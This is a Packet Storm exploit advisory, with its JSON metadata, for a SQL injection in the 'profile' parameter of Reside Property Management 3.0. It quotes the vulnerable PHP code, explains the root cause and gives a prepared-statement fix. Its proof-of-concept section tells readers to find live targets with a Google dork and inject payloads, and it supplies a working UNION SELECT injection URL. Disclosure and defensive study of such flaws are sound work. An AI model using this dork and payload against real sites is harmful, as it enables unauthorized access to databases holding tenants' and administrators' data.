ID PACKETSTORM:158245
Type packetstorm
Reporter AmirMohammad Safari
Modified 2020-06-30T00:00:00
Description
`# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection
# Date: 2020-06-28
# Google Dork: "Copyright 2020 Reside Property Management"
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/
# Version: v3.0 [Final Version]
# Tested on: Windows/Linux
# CVE: N/A
.:: Description ::.
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.
.:: Vulnerable File ::.
profile.php
.:: Vulnerable Code ::.
- Line 21: $profile = $_GET['profile'];
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";
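- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());
Root cause: the 'profile' GET value reaches the query on line 90 with only '-' replaced by a space on line 22. It is never escaped or bound, so a single quote in the parameter closes the string literal in the WHERE clause. The die() on line 91 also returns the database error text to the requester.
Fix: run the lookup as a prepared statement (mysqli_prepare() with mysqli_stmt_bind_param() for adminName) and log query errors server-side instead of printing them.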
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With the above Dork.
Step 2 - Find profile.php File in Target
Step 3 - Inject Your Payloads in profile parameter
.:: Sample Request ::.
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23
`
{"id": "PACKETSTORM:158245", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Reside Property Management 3.0 SQL Injection", "description": "", "published": "2020-06-30T00:00:00", "modified": "2020-06-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/158245/Reside-Property-Management-3.0-SQL-Injection.html", "reporter": "AmirMohammad Safari", "references": [], "cvelist": [], "lastseen": "2020-07-01T12:47:50", "viewCount": 50, "enchantments": {"dependencies": {"references": [], "modified": "2020-07-01T12:47:50", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-07-01T12:47:50", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/158245/residepropman30-sql.txt", "sourceData": "`# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection \n# Date: 2020-06-28 \n# Google Dork: \"Copyright 2020 Reside Property Management\" \n# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) \n# Team Members: Behzad Khalifeh , Milad Ranjbar \n# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/ \n# Version: v3.0 [Final Version] \n# Tested on: Windows/Linux \n# CVE: N/A \n \n.:: Description ::. \nRESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device. \n \n \n.:: Vulnerable File ::. \nprofile.php \n \n \n.:: Vulnerable Code ::. \n- Line 21: $profile = $_GET['profile']; \n- Line 22: $adminsName = preg_replace('/-/', ' ', $profile); \n- Line 90: $sql = \"SELECT * FROM admins WHERE adminName = '\" . $adminsName . \"'\"; \n- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error()); \n \n \n.:: Proof Of Concept (PoC) ::. \nStep 1 - Find Your Target With the above Dork. 
\nStep 2 - Find profile.php File in Target \nStep 3 - Inject Your Payloads in profile parameter \n \n \n.:: Sample Request ::. \nlocalhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23 \n \n`\n"}
{}